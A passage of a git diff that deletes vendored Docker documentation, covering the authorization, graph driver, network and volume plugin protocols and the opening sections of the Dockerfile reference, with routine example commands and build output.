- - -#### Plugin -> Daemon - -Name | Type | Description ---------|--------|---------------------------------------------------------------------------------- -Allow | bool | Boolean value indicating whether the request is allowed or denied -Msg | string | Authorization message (will be returned to the client in case the access is denied) -Err | string | Error message (will be returned to the client in case the plugin encounter an error. The string value supplied may appear in logs, so should not include confidential information) - -### Response authorization - -The plugin must support two authorization messages formats, one from the daemon to the plugin and then from the plugin to the daemon. The tables below detail the content expected in each message. - -#### Daemon -> Plugin - - -Name | Type | Description ------------------------ |------------------ |---------------------------------------------------- -User | string | The user identification -Authentication method | string | The authentication method used -Request method | string | The HTTP method (GET/DELETE/POST) -Request URI | string | The HTTP request URI including API version (e.g., v.1.17/containers/json) -Request headers | map[string]string | Request headers as key value pairs (without the authorization header) -Request body | []byte | Raw request body -Response status code | int | Status code from the docker daemon -Response headers | map[string]string | Response headers as key value pairs -Response body | []byte | Raw docker daemon response body - - -#### Plugin -> Daemon - -Name | Type | Description ---------|--------|---------------------------------------------------------------------------------- -Allow | bool | Boolean value indicating whether the response is allowed or denied -Msg | string | Authorization message (will be returned to the client in case the access is denied) -Err | string | Error message (will be returned to the client in case the plugin encounter an error. The string value supplied may appear in logs, so should not include confidential information) diff --git a/vendor/github.com/docker/docker/docs/extend/plugins_graphdriver.md b/vendor/github.com/docker/docker/docs/extend/plugins_graphdriver.md deleted file mode 100644 index d91c383b5f..0000000000 --- a/vendor/github.com/docker/docker/docs/extend/plugins_graphdriver.md +++ /dev/null @@ -1,376 +0,0 @@ ---- -title: "Graphdriver plugins" -description: "How to manage image and container filesystems with external plugins" -keywords: "Examples, Usage, storage, image, docker, data, graph, plugin, api" -advisory: experimental ---- - - - - -## Changelog - -### 1.13.0 - -- Support v2 plugins - -# Docker graph driver plugins - -Docker graph driver plugins enable admins to use an external/out-of-process -graph driver for use with Docker engine. This is an alternative to using the -built-in storage drivers, such as aufs/overlay/devicemapper/btrfs. - -You need to install and enable the plugin and then restart the Docker daemon -before using the plugin. See the following example for the correct ordering -of steps. - -``` -$ docker plugin install cpuguy83/docker-overlay2-graphdriver-plugin # this command also enables the driver - -$ pkill dockerd -$ dockerd --experimental -s cpuguy83/docker-overlay2-graphdriver-plugin -``` - -# Write a graph driver plugin - -See the [plugin documentation](/docs/extend/index.md) for detailed information -on the underlying plugin protocol. - - -## Graph Driver plugin protocol - -If a plugin registers itself as a `GraphDriver` when activated, then it is -expected to provide the rootfs for containers as well as image layer storage. - -### /GraphDriver.Init - -**Request**: -```json -{ - "Home": "/graph/home/path", - "Opts": [], - "UIDMaps": [], - "GIDMaps": [] -} -``` - -Initialize the graph driver plugin with a home directory and array of options. -These are passed through from the user, but the plugin is not required to parse -or honor them. - -The request also includes a list of UID and GID mappings, structed as follows: -```json -{ - "ContainerID": 0, - "HostID": 0, - "Size": 0 -} -``` - -**Response**: -```json -{ - "Err": "" -} -``` - -Respond with a non-empty string error if an error occurred. - - -### /GraphDriver.Create - -**Request**: -```json -{ - "ID": "46fe8644f2572fd1e505364f7581e0c9dbc7f14640bd1fb6ce97714fb6fc5187", - "Parent": "2cd9c322cb78a55e8212aa3ea8425a4180236d7106938ec921d0935a4b8ca142", - "MountLabel": "", - "StorageOpt": {} -} -``` - -Create a new, empty, read-only filesystem layer with the specified -`ID`, `Parent` and `MountLabel`. If `Parent` is an empty string, there is no -parent layer. `StorageOpt` is map of strings which indicate storage options. - -**Response**: -```json -{ - "Err": "" -} -``` - -Respond with a non-empty string error if an error occurred. - -### /GraphDriver.CreateReadWrite - -**Request**: -```json -{ - "ID": "46fe8644f2572fd1e505364f7581e0c9dbc7f14640bd1fb6ce97714fb6fc5187", - "Parent": "2cd9c322cb78a55e8212aa3ea8425a4180236d7106938ec921d0935a4b8ca142", - "MountLabel": "", - "StorageOpt": {} -} -``` - -Similar to `/GraphDriver.Create` but creates a read-write filesystem layer. - -### /GraphDriver.Remove - -**Request**: -```json -{ - "ID": "46fe8644f2572fd1e505364f7581e0c9dbc7f14640bd1fb6ce97714fb6fc5187" -} -``` - -Remove the filesystem layer with this given `ID`. - -**Response**: -```json -{ - "Err": "" -} -``` - -Respond with a non-empty string error if an error occurred. - -### /GraphDriver.Get - -**Request**: -```json -{ - "ID": "46fe8644f2572fd1e505364f7581e0c9dbc7f14640bd1fb6ce97714fb6fc5187", - "MountLabel": "" -} -``` - -Get the mountpoint for the layered filesystem referred to by the given `ID`. - -**Response**: -```json -{ - "Dir": "/var/mygraph/46fe8644f2572fd1e505364f7581e0c9dbc7f14640bd1fb6ce97714fb6fc5187", - "Err": "" -} -``` - -Respond with the absolute path to the mounted layered filesystem. -Respond with a non-empty string error if an error occurred. - -### /GraphDriver.Put - -**Request**: -```json -{ - "ID": "46fe8644f2572fd1e505364f7581e0c9dbc7f14640bd1fb6ce97714fb6fc5187" -} -``` - -Release the system resources for the specified `ID`, such as unmounting the -filesystem layer. - -**Response**: -```json -{ - "Err": "" -} -``` - -Respond with a non-empty string error if an error occurred. - -### /GraphDriver.Exists - -**Request**: -```json -{ - "ID": "46fe8644f2572fd1e505364f7581e0c9dbc7f14640bd1fb6ce97714fb6fc5187" -} -``` - -Determine if a filesystem layer with the specified `ID` exists. - -**Response**: -```json -{ - "Exists": true -} -``` - -Respond with a boolean for whether or not the filesystem layer with the specified -`ID` exists. - -### /GraphDriver.Status - -**Request**: -```json -{} -``` - -Get low-level diagnostic information about the graph driver. - -**Response**: -```json -{ - "Status": [[]] -} -``` - -Respond with a 2-D array with key/value pairs for the underlying status -information. - - -### /GraphDriver.GetMetadata - -**Request**: -```json -{ - "ID": "46fe8644f2572fd1e505364f7581e0c9dbc7f14640bd1fb6ce97714fb6fc5187" -} -``` - -Get low-level diagnostic information about the layered filesystem with the -with the specified `ID` - -**Response**: -```json -{ - "Metadata": {}, - "Err": "" -} -``` - -Respond with a set of key/value pairs containing the low-level diagnostic -information about the layered filesystem. -Respond with a non-empty string error if an error occurred. - -### /GraphDriver.Cleanup - -**Request**: -```json -{} -``` - -Perform necessary tasks to release resources help by the plugin, such as -unmounting all the layered file systems. - -**Response**: -```json -{ - "Err": "" -} -``` - -Respond with a non-empty string error if an error occurred. - - -### /GraphDriver.Diff - -**Request**: -```json -{ - "ID": "46fe8644f2572fd1e505364f7581e0c9dbc7f14640bd1fb6ce97714fb6fc5187", - "Parent": "2cd9c322cb78a55e8212aa3ea8425a4180236d7106938ec921d0935a4b8ca142" -} -``` - -Get an archive of the changes between the filesystem layers specified by the `ID` -and `Parent`. `Parent` may be an empty string, in which case there is no parent. - -**Response**: -``` -{{ TAR STREAM }} -``` - -### /GraphDriver.Changes - -**Request**: -```json -{ - "ID": "46fe8644f2572fd1e505364f7581e0c9dbc7f14640bd1fb6ce97714fb6fc5187", - "Parent": "2cd9c322cb78a55e8212aa3ea8425a4180236d7106938ec921d0935a4b8ca142" -} -``` - -Get a list of changes between the filesystem layers specified by the `ID` and -`Parent`. If `Parent` is an empty string, there is no parent. - -**Response**: -```json -{ - "Changes": [{}], - "Err": "" -} -``` - -Respond with a list of changes. The structure of a change is: -```json - "Path": "/some/path", - "Kind": 0, -``` - -Where the `Path` is the filesystem path within the layered filesystem that is -changed and `Kind` is an integer specifying the type of change that occurred: - -- 0 - Modified -- 1 - Added -- 2 - Deleted - -Respond with a non-empty string error if an error occurred. - -### /GraphDriver.ApplyDiff - -**Request**: -``` -{{ TAR STREAM }} -``` - -Extract the changeset from the given diff into the layer with the specified `ID` -and `Parent` - -**Query Parameters**: - -- id (required)- the `ID` of the new filesystem layer to extract the diff to -- parent (required)- the `Parent` of the given `ID` - -**Response**: -```json -{ - "Size": 512366, - "Err": "" -} -``` - -Respond with the size of the new layer in bytes. -Respond with a non-empty string error if an error occurred. - -### /GraphDriver.DiffSize - -**Request**: -```json -{ - "ID": "46fe8644f2572fd1e505364f7581e0c9dbc7f14640bd1fb6ce97714fb6fc5187", - "Parent": "2cd9c322cb78a55e8212aa3ea8425a4180236d7106938ec921d0935a4b8ca142" -} -``` - -Calculate the changes between the specified `ID` - -**Response**: -```json -{ - "Size": 512366, - "Err": "" -} -``` - -Respond with the size changes between the specified `ID` and `Parent` -Respond with a non-empty string error if an error occurred. diff --git a/vendor/github.com/docker/docker/docs/extend/plugins_network.md b/vendor/github.com/docker/docker/docs/extend/plugins_network.md deleted file mode 100644 index a974862fa6..0000000000 --- a/vendor/github.com/docker/docker/docs/extend/plugins_network.md +++ /dev/null @@ -1,77 +0,0 @@ ---- -title: "Docker network driver plugins" -description: "Network driver plugins." -keywords: "Examples, Usage, plugins, docker, documentation, user guide" ---- - - - -# Engine network driver plugins - -This document describes Docker Engine network driver plugins generally -available in Docker Engine. To view information on plugins -managed by Docker Engine, refer to [Docker Engine plugin system](index.md). - -Docker Engine network plugins enable Engine deployments to be extended to -support a wide range of networking technologies, such as VXLAN, IPVLAN, MACVLAN -or something completely different. Network driver plugins are supported via the -LibNetwork project. Each plugin is implemented as a "remote driver" for -LibNetwork, which shares plugin infrastructure with Engine. Effectively, network -driver plugins are activated in the same way as other plugins, and use the same -kind of protocol. - -## Network driver plugins and swarm mode - -Docker 1.12 adds support for cluster management and orchestration called -[swarm mode](https://docs.docker.com/engine/swarm/). Docker Engine running in swarm mode currently -only supports the built-in overlay driver for networking. Therefore existing -networking plugins will not work in swarm mode. - -When you run Docker Engine outside of swarm mode, all networking plugins that -worked in Docker 1.11 will continue to function normally. They do not require -any modification. - -## Using network driver plugins - -The means of installing and running a network driver plugin depend on the -particular plugin. So, be sure to install your plugin according to the -instructions obtained from the plugin developer. - -Once running however, network driver plugins are used just like the built-in -network drivers: by being mentioned as a driver in network-oriented Docker -commands. For example, - - $ docker network create --driver weave mynet - -Some network driver plugins are listed in [plugins](legacy_plugins.md) - -The `mynet` network is now owned by `weave`, so subsequent commands -referring to that network will be sent to the plugin, - - $ docker run --network=mynet busybox top - - -## Write a network plugin - -Network plugins implement the [Docker plugin -API](plugin_api.md) and the network plugin protocol - -## Network plugin protocol - -The network driver protocol, in addition to the plugin activation call, is -documented as part of libnetwork: -[https://github.com/docker/libnetwork/blob/master/docs/remote.md](https://github.com/docker/libnetwork/blob/master/docs/remote.md). - -# Related Information - -To interact with the Docker maintainers and other interested users, see the IRC channel `#docker-network`. - -- [Docker networks feature overview](https://docs.docker.com/engine/userguide/networking/) -- The [LibNetwork](https://github.com/docker/libnetwork) project diff --git a/vendor/github.com/docker/docker/docs/extend/plugins_volume.md b/vendor/github.com/docker/docker/docs/extend/plugins_volume.md deleted file mode 100644 index c060bf39b1..0000000000 --- a/vendor/github.com/docker/docker/docs/extend/plugins_volume.md +++ /dev/null @@ -1,276 +0,0 @@ ---- -title: "Volume plugins" -description: "How to manage data with external volume plugins" -keywords: "Examples, Usage, volume, docker, data, volumes, plugin, api" ---- - - - -# Write a volume plugin - -Docker Engine volume plugins enable Engine deployments to be integrated with -external storage systems, such as Amazon EBS, and enable data volumes to persist -beyond the lifetime of a single Engine host. See the -[plugin documentation](legacy_plugins.md) for more information. - -## Changelog - -### 1.13.0 - -- If used as part of the v2 plugin architecture, mountpoints that are part of paths returned by plugin have to be mounted under the directory specified by PropagatedMount in the plugin configuration [#26398](https://github.com/docker/docker/pull/26398) - -### 1.12.0 - -- Add `Status` field to `VolumeDriver.Get` response ([#21006](https://github.com/docker/docker/pull/21006#)) -- Add `VolumeDriver.Capabilities` to get capabilities of the volume driver([#22077](https://github.com/docker/docker/pull/22077)) - -### 1.10.0 - -- Add `VolumeDriver.Get` which gets the details about the volume ([#16534](https://github.com/docker/docker/pull/16534)) -- Add `VolumeDriver.List` which lists all volumes owned by the driver ([#16534](https://github.com/docker/docker/pull/16534)) - -### 1.8.0 - -- Initial support for volume driver plugins ([#14659](https://github.com/docker/docker/pull/14659)) - -## Command-line changes - -A volume plugin makes use of the `-v`and `--volume-driver` flag on the `docker run` command. The `-v` flag accepts a volume name and the `--volume-driver` flag a driver type, for example: - - $ docker run -ti -v volumename:/data --volume-driver=flocker busybox sh - -This command passes the `volumename` through to the volume plugin as a -user-given name for the volume. The `volumename` must not begin with a `/`. - -By having the user specify a `volumename`, a plugin can associate the volume -with an external volume beyond the lifetime of a single container or container -host. This can be used, for example, to move a stateful container from one -server to another. - -By specifying a `volumedriver` in conjunction with a `volumename`, users can use plugins such as [Flocker](https://clusterhq.com/docker-plugin/) to manage volumes external to a single host, such as those on EBS. - - -## Create a VolumeDriver - -The container creation endpoint (`/containers/create`) accepts a `VolumeDriver` -field of type `string` allowing to specify the name of the driver. It's default -value of `"local"` (the default driver for local volumes). - -## Volume plugin protocol - -If a plugin registers itself as a `VolumeDriver` when activated, then it is -expected to provide writeable paths on the host filesystem for the Docker -daemon to provide to containers to consume. - -The Docker daemon handles bind-mounting the provided paths into user -containers. - -> **Note**: Volume plugins should *not* write data to the `/var/lib/docker/` -> directory, including `/var/lib/docker/volumes`. The `/var/lib/docker/` -> directory is reserved for Docker. - -### /VolumeDriver.Create - -**Request**: -```json -{ - "Name": "volume_name", - "Opts": {} -} -``` - -Instruct the plugin that the user wants to create a volume, given a user -specified volume name. The plugin does not need to actually manifest the -volume on the filesystem yet (until Mount is called). -Opts is a map of driver specific options passed through from the user request. - -**Response**: -```json -{ - "Err": "" -} -``` - -Respond with a string error if an error occurred. - -### /VolumeDriver.Remove - -**Request**: -```json -{ - "Name": "volume_name" -} -``` - -Delete the specified volume from disk. This request is issued when a user invokes `docker rm -v` to remove volumes associated with a container. - -**Response**: -```json -{ - "Err": "" -} -``` - -Respond with a string error if an error occurred. - -### /VolumeDriver.Mount - -**Request**: -```json -{ - "Name": "volume_name", - "ID": "b87d7442095999a92b65b3d9691e697b61713829cc0ffd1bb72e4ccd51aa4d6c" -} -``` - -Docker requires the plugin to provide a volume, given a user specified volume -name. This is called once per container start. If the same volume_name is requested -more than once, the plugin may need to keep track of each new mount request and provision -at the first mount request and deprovision at the last corresponding unmount request. - -`ID` is a unique ID for the caller that is requesting the mount. - -**Response**: -```json -{ - "Mountpoint": "/path/to/directory/on/host", - "Err": "" -} -``` - -Respond with the path on the host filesystem where the volume has been made -available, and/or a string error if an error occurred. - -### /VolumeDriver.Path - -**Request**: -```json -{ - "Name": "volume_name" -} -``` - -Docker needs reminding of the path to the volume on the host. - -**Response**: -```json -{ - "Mountpoint": "/path/to/directory/on/host", - "Err": "" -} -``` - -Respond with the path on the host filesystem where the volume has been made -available, and/or a string error if an error occurred. `Mountpoint` is optional, -however the plugin may be queried again later if one is not provided. - -### /VolumeDriver.Unmount - -**Request**: -```json -{ - "Name": "volume_name", - "ID": "b87d7442095999a92b65b3d9691e697b61713829cc0ffd1bb72e4ccd51aa4d6c" -} -``` - -Indication that Docker no longer is using the named volume. This is called once -per container stop. Plugin may deduce that it is safe to deprovision it at -this point. - -`ID` is a unique ID for the caller that is requesting the mount. - -**Response**: -```json -{ - "Err": "" -} -``` - -Respond with a string error if an error occurred. - - -### /VolumeDriver.Get - -**Request**: -```json -{ - "Name": "volume_name" -} -``` - -Get the volume info. - - -**Response**: -```json -{ - "Volume": { - "Name": "volume_name", - "Mountpoint": "/path/to/directory/on/host", - "Status": {} - }, - "Err": "" -} -``` - -Respond with a string error if an error occurred. `Mountpoint` and `Status` are -optional. - - -### /VolumeDriver.List - -**Request**: -```json -{} -``` - -Get the list of volumes registered with the plugin. - -**Response**: -```json -{ - "Volumes": [ - { - "Name": "volume_name", - "Mountpoint": "/path/to/directory/on/host" - } - ], - "Err": "" -} -``` - -Respond with a string error if an error occurred. `Mountpoint` is optional. - -### /VolumeDriver.Capabilities - -**Request**: -```json -{} -``` - -Get the list of capabilities the driver supports. -The driver is not required to implement this endpoint, however in such cases -the default values will be taken. - -**Response**: -```json -{ - "Capabilities": { - "Scope": "global" - } -} -``` - -Supported scopes are `global` and `local`. Any other value in `Scope` will be -ignored and assumed to be `local`. Scope allows cluster managers to handle the -volume differently, for instance with a scope of `global`, the cluster manager -knows it only needs to create the volume once instead of on every engine. More -capabilities may be added in the future. diff --git a/vendor/github.com/docker/docker/docs/reference/builder.md b/vendor/github.com/docker/docker/docs/reference/builder.md deleted file mode 100644 index 6fa5a24150..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/builder.md +++ /dev/null @@ -1,1746 +0,0 @@ ---- -title: "Dockerfile reference" -description: "Dockerfiles use a simple DSL which allows you to automate the steps you would normally manually take to create an image." -keywords: "builder, docker, Dockerfile, automation, image creation" ---- - - - -# Dockerfile reference - -Docker can build images automatically by reading the instructions from a -`Dockerfile`. A `Dockerfile` is a text document that contains all the commands a -user could call on the command line to assemble an image. Using `docker build` -users can create an automated build that executes several command-line -instructions in succession. - -This page describes the commands you can use in a `Dockerfile`. When you are -done reading this page, refer to the [`Dockerfile` Best -Practices](https://docs.docker.com/engine/userguide/eng-image/dockerfile_best-practices/) for a tip-oriented guide. - -## Usage - -The [`docker build`](commandline/build.md) command builds an image from -a `Dockerfile` and a *context*. The build's context is the files at a specified -location `PATH` or `URL`. The `PATH` is a directory on your local filesystem. -The `URL` is a Git repository location. - -A context is processed recursively. So, a `PATH` includes any subdirectories and -the `URL` includes the repository and its submodules. A simple build command -that uses the current directory as context: - - $ docker build . - Sending build context to Docker daemon 6.51 MB - ... - -The build is run by the Docker daemon, not by the CLI. The first thing a build -process does is send the entire context (recursively) to the daemon. In most -cases, it's best to start with an empty directory as context and keep your -Dockerfile in that directory. Add only the files needed for building the -Dockerfile. - ->**Warning**: Do not use your root directory, `/`, as the `PATH` as it causes ->the build to transfer the entire contents of your hard drive to the Docker ->daemon. - -To use a file in the build context, the `Dockerfile` refers to the file specified -in an instruction, for example, a `COPY` instruction. To increase the build's -performance, exclude files and directories by adding a `.dockerignore` file to -the context directory. For information about how to [create a `.dockerignore` -file](#dockerignore-file) see the documentation on this page. - -Traditionally, the `Dockerfile` is called `Dockerfile` and located in the root -of the context. You use the `-f` flag with `docker build` to point to a Dockerfile -anywhere in your file system. - - $ docker build -f /path/to/a/Dockerfile . - -You can specify a repository and tag at which to save the new image if -the build succeeds: - - $ docker build -t shykes/myapp . - -To tag the image into multiple repositories after the build, -add multiple `-t` parameters when you run the `build` command: - - $ docker build -t shykes/myapp:1.0.2 -t shykes/myapp:latest . - -Before the Docker daemon runs the instructions in the `Dockerfile`, it performs -a preliminary validation of the `Dockerfile` and returns an error if the syntax is incorrect: - - $ docker build -t test/myapp . - Sending build context to Docker daemon 2.048 kB - Error response from daemon: Unknown instruction: RUNCMD - -The Docker daemon runs the instructions in the `Dockerfile` one-by-one, -committing the result of each instruction -to a new image if necessary, before finally outputting the ID of your -new image. The Docker daemon will automatically clean up the context you -sent. - -Note that each instruction is run independently, and causes a new image -to be created - so `RUN cd /tmp` will not have any effect on the next -instructions. - -Whenever possible, Docker will re-use the intermediate images (cache), -to accelerate the `docker build` process significantly. This is indicated by -the `Using cache` message in the console output. -(For more information, see the [Build cache section](https://docs.docker.com/engine/userguide/eng-image/dockerfile_best-practices/#/build-cache)) in the -`Dockerfile` best practices guide: - - $ docker build -t svendowideit/ambassador . - Sending build context to Docker daemon 15.36 kB - Step 1/4 : FROM alpine:3.2 - ---> 31f630c65071 - Step 2/4 : MAINTAINER SvenDowideit@home.org.au - ---> Using cache - ---> 2a1c91448f5f - Step 3/4 : RUN apk update && apk add socat && rm -r /var/cache/ - ---> Using cache - ---> 21ed6e7fbb73 - Step 4/4 : CMD env | grep _TCP= | (sed 's/.*_PORT_\([0-9]*\)_TCP=tcp:\/\/\(.*\):\(.*\)/socat -t 100000000 TCP4-LISTEN:\1,fork,reuseaddr TCP4:\2:\3 \&/' && echo wait) | sh - ---> Using cache - ---> 7ea8aef582cc - Successfully built 7ea8aef582cc - -Build cache is only used from images that have a local parent chain. This means -that these images were created by previous builds or the whole chain of images -was loaded with `docker load`. If you wish to use build cache of a specific -image you can specify it with `--cache-from` option. Images specified with -`--cache-from` do not need to have a parent chain and may be pulled from other -registries. - -When you're done with your build, you're ready to look into [*Pushing a -repository to its registry*](https://docs.docker.com/engine/tutorials/dockerrepos/#/contributing-to-docker-hub). - -## Format - -Here is the format of the `Dockerfile`: - -```Dockerfile -# Comment -INSTRUCTION arguments -``` - -The instruction is not case-sensitive. However, convention is for them to -be UPPERCASE to distinguish them from arguments more easily. - - -Docker runs instructions in a `Dockerfile` in order. **The first -instruction must be \`FROM\`** in order to specify the [*Base -Image*](glossary.md#base-image) from which you are building. - -Docker treats lines that *begin* with `#` as a comment, unless the line is -a valid [parser directive](#parser-directives). A `#` marker anywhere -else in a line is treated as an argument. This allows statements like: - -```Dockerfile -# Comment -RUN echo 'we are running some # of cool things' -``` - -Line continuation characters are not supported in comments. - -## Parser directives - -Parser directives are optional, and affect the way in which subsequent lines -in a `Dockerfile` are handled. Parser directives do not add layers to the build, -and will not be shown as a build step. Parser directives are written as a -special type of comment in the form `# directive=value`. A single directive -may only be used once. - -Once a comment, empty line or builder instruction has been processed, Docker -no longer looks for parser directives. Instead it treats anything formatted -as a parser directive as a comment and does not attempt to validate if it might -be a parser directive. Therefore, all parser directives must be at the very -top of a `Dockerfile`. - -Parser directives are not case-sensitive. However, convention is for them to -be lowercase. Convention is also to include a blank line following any -parser directives. Line continuation characters are not supported in parser -directives. - -Due to these rules, the following examples are all invalid: - -Invalid due to line continuation: - -```Dockerfile -# direc \ -tive=value -``` - -Invalid due to appearing twice: - -```Dockerfile -# directive=value1 -# directive=value2 - -FROM ImageName -``` - -Treated as a comment due to appearing after a builder instruction: - -```Dockerfile -FROM ImageName -# directive=value -``` - -Treated as a comment due to appearing after a comment which is not a parser -directive: - -```Dockerfile -# About my dockerfile -FROM ImageName -# directive=value -``` - -The unknown directive is treated as a comment due to not being recognized. In -addition, the known directive is treated as a comment due to appearing after -a comment which is not a parser directive. - -```Dockerfile -# unknowndirective=value -# knowndirective=value -``` - -Non line-breaking whitespace is permitted in a parser directive. Hence, the -following lines are all treated identically: - -```Dockerfile -#directive=value -# directive =value -# directive= value -# directive = value -# dIrEcTiVe=value -``` - -The following parser directive is supported: - -* `escape` - -## escape - - # escape=\ (backslash) - -Or - - # escape=` (backtick) - -The `escape` directive sets the character used to escape characters in a -`Dockerfile`. If not specified, the default escape character is `\`. - -The escape character is used both to escape characters in a line, and to -escape a newline. This allows a `Dockerfile` instruction to -span multiple lines. Note that regardless of whether the `escape` parser -directive is included in a `Dockerfile`, *escaping is not performed in -a `RUN` command, except at the end of a line.* - -Setting the escape character to `` ` `` is especially useful on -`Windows`, where `\` is the directory path separator. `` ` `` is consistent -with [Windows PowerShell](https://technet.microsoft.com/en-us/library/hh847755.aspx). - -Consider the following example which would fail in a non-obvious way on -`Windows`. The second `\` at the end of the second line would be interpreted as an -escape for the newline, instead of a target of the escape from the first `\`. -Similarly, the `\` at the end of the third line would, assuming it was actually -handled as an instruction, cause it be treated as a line continuation. The result -of this dockerfile is that second and third lines are considered a single -instruction: - -```Dockerfile -FROM microsoft/nanoserver -COPY testfile.txt c:\\ -RUN dir c:\ -``` - -Results in: - - PS C:\John> docker build -t cmd . - Sending build context to Docker daemon 3.072 kB - Step 1/2 : FROM microsoft/nanoserver - ---> 22738ff49c6d - Step 2/2 : COPY testfile.txt c:\RUN dir c: - GetFileAttributesEx c:RUN: The system cannot find the file specified. - PS C:\John> - -One solution to the above would be to use `/` as the target of both the `COPY` -instruction, and `dir`. However, this syntax is, at best, confusing as it is not -natural for paths on `Windows`, and at worst, error prone as not all commands on -`Windows` support `/` as the path separator. - -By adding the `escape` parser directive, the following `Dockerfile` succeeds as -expected with the use of natural platform semantics for file paths on `Windows`: - - # escape=` - - FROM microsoft/nanoserver - COPY testfile.txt c:\ - RUN dir c:\ - -Results in: - - PS C:\John> docker build -t succeeds --no-cache=true . - Sending build context to Docker daemon 3.072 kB - Step 1/3 : FROM microsoft/nanoserver - ---> 22738ff49c6d - Step 2/3 : COPY testfile.txt c:\ - ---> 96655de338de - Removing intermediate container 4db9acbb1682 - Step 3/3 : RUN dir c:\ - ---> Running in a2c157f842f5 - Volume in drive C has no label. - Volume Serial Number is 7E6D-E0F7 - - Directory of c:\ - - 10/05/2016 05:04 PM 1,894 License.txt - 10/05/2016 02:22 PM

Program Files - 10/05/2016 02:14 PM Program Files (x86) - 10/28/2016 11:18 AM 62 testfile.txt - 10/28/2016 11:20 AM Users - 10/28/2016 11:20 AM Windows - 2 File(s) 1,956 bytes - 4 Dir(s) 21,259,096,064 bytes free - ---> 01c7f3bef04f - Removing intermediate container a2c157f842f5 - Successfully built 01c7f3bef04f - PS C:\John> - -## Environment replacement - -Environment variables (declared with [the `ENV` statement](#env)) can also be -used in certain instructions as variables to be interpreted by the -`Dockerfile`. Escapes are also handled for including variable-like syntax -into a statement literally. - -Environment variables are notated in the `Dockerfile` either with -`$variable_name` or `${variable_name}`. They are treated equivalently and the -brace syntax is typically used to address issues with variable names with no -whitespace, like `${foo}_bar`. - -The `${variable_name}` syntax also supports a few of the standard `bash` -modifiers as specified below: - -* `${variable:-word}` indicates that if `variable` is set then the result - will be that value. If `variable` is not set then `word` will be the result. -* `${variable:+word}` indicates that if `variable` is set then `word` will be - the result, otherwise the result is the empty string. - -In all cases, `word` can be any string, including additional environment -variables. - -Escaping is possible by adding a `\` before the variable: `\$foo` or `\${foo}`, -for example, will translate to `$foo` and `${foo}` literals respectively. - -Example (parsed representation is displayed after the `#`): - - FROM busybox - ENV foo /bar - WORKDIR ${foo} # WORKDIR /bar - ADD . $foo # ADD . /bar - COPY \$foo /quux # COPY $foo /quux - -Environment variables are supported by the following list of instructions in -the `Dockerfile`: - -* `ADD` -* `COPY` -* `ENV` -* `EXPOSE` -* `LABEL` -* `USER` -* `WORKDIR` -* `VOLUME` -* `STOPSIGNAL` - -as well as: - -* `ONBUILD` (when combined with one of the supported instructions above) - -> **Note**: -> prior to 1.4, `ONBUILD` instructions did **NOT** support environment -> variable, even when combined with any of the instructions listed above. - -Environment variable substitution will use the same value for each variable -throughout the entire command. In other words, in this example: - - ENV abc=hello - ENV abc=bye def=$abc - ENV ghi=$abc - -will result in `def` having a value of `hello`, not `bye`. However, -`ghi` will have a value of `bye` because it is not part of the same command -that set `abc` to `bye`. - -## .dockerignore file - -Before the docker CLI sends the context to the docker daemon, it looks -for a file named `.dockerignore` in the root directory of the context. -If this file exists, the CLI modifies the context to exclude files and -directories that match patterns in it. This helps to avoid -unnecessarily sending large or sensitive files and directories to the -daemon and potentially adding them to images using `ADD` or `COPY`. - -The CLI interprets the `.dockerignore` file as a newline-separated -list of patterns similar to the file globs of Unix shells. For the -purposes of matching, the root of the context is considered to be both -the working and the root directory. For example, the patterns -`/foo/bar` and `foo/bar` both exclude a file or directory named `bar` -in the `foo` subdirectory of `PATH` or in the root of the git -repository located at `URL`. Neither excludes anything else. - -If a line in `.dockerignore` file starts with `#` in column 1, then this line is -considered as a comment and is ignored before interpreted by the CLI. - -Here is an example `.dockerignore` file: - -``` -# comment - */temp* - */*/temp* - temp? -``` - -This file causes the following build behavior: - -| Rule | Behavior | -|----------------|------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| -| `# comment` | Ignored. | -| `*/temp*` | Exclude files and directories whose names start with `temp` in any immediate subdirectory of the root. For example, the plain file `/somedir/temporary.txt` is excluded, as is the directory `/somedir/temp`. | -| `*/*/temp*` | Exclude files and directories starting with `temp` from any subdirectory that is two levels below the root. For example, `/somedir/subdir/temporary.txt` is excluded. | -| `temp?` | Exclude files and directories in the root directory whose names are a one-character extension of `temp`. For example, `/tempa` and `/tempb` are excluded. - - -Matching is done using Go's -[filepath.Match](http://golang.org/pkg/path/filepath#Match) rules. A -preprocessing step removes leading and trailing whitespace and -eliminates `.` and `..` elements using Go's -[filepath.Clean](http://golang.org/pkg/path/filepath/#Clean). Lines -that are blank after preprocessing are ignored. - -Beyond Go's filepath.Match rules, Docker also supports a special -wildcard string `**` that matches any number of directories (including -zero). For example, `**/*.go` will exclude all files that end with `.go` -that are found in all directories, including the root of the build context. - -Lines starting with `!` (exclamation mark) can be used to make exceptions -to exclusions. The following is an example `.dockerignore` file that -uses this mechanism: - -``` - *.md - !README.md -``` - -All markdown files *except* `README.md` are excluded from the context. - -The placement of `!` exception rules influences the behavior: the last -line of the `.dockerignore` that matches a particular file determines -whether it is included or excluded. Consider the following example: - -``` - *.md - !README*.md - README-secret.md -``` - -No markdown files are included in the context except README files other than -`README-secret.md`. - -Now consider this example: - -``` - *.md - README-secret.md - !README*.md -``` - -All of the README files are included. The middle line has no effect because -`!README*.md` matches `README-secret.md` and comes last. - -You can even use the `.dockerignore` file to exclude the `Dockerfile` -and `.dockerignore` files. These files are still sent to the daemon -because it needs them to do its job. But the `ADD` and `COPY` commands -do not copy them to the image. - -Finally, you may want to specify which files to include in the -context, rather than which to exclude. To achieve this, specify `*` as -the first pattern, followed by one or more `!` exception patterns. - -**Note**: For historical reasons, the pattern `.` is ignored. - -## FROM - - FROM - -Or - - FROM : - -Or - - FROM @ - -The `FROM` instruction sets the [*Base Image*](glossary.md#base-image) -for subsequent instructions. As such, a valid `Dockerfile` must have `FROM` as -its first instruction. The image can be any valid image – it is especially easy -to start by **pulling an image** from the [*Public Repositories*](https://docs.docker.com/engine/tutorials/dockerrepos/). - -- `FROM` must be the first non-comment instruction in the `Dockerfile`. - -- `FROM` can appear multiple times within a single `Dockerfile` in order to create -multiple images. Simply make a note of the last image ID output by the commit -before each new `FROM` command. - -- The `tag` or `digest` values are optional. If you omit either of them, the builder -assumes a `latest` by default. The builder returns an error if it cannot match -the `tag` value. - -## RUN - -RUN has 2 forms: - -- `RUN ` (*shell* form, the command is run in a shell, which by -default is `/bin/sh -c` on Linux or `cmd /S /C` on Windows) -- `RUN ["executable", "param1", "param2"]` (*exec* form) - -The `RUN` instruction will execute any commands in a new layer on top 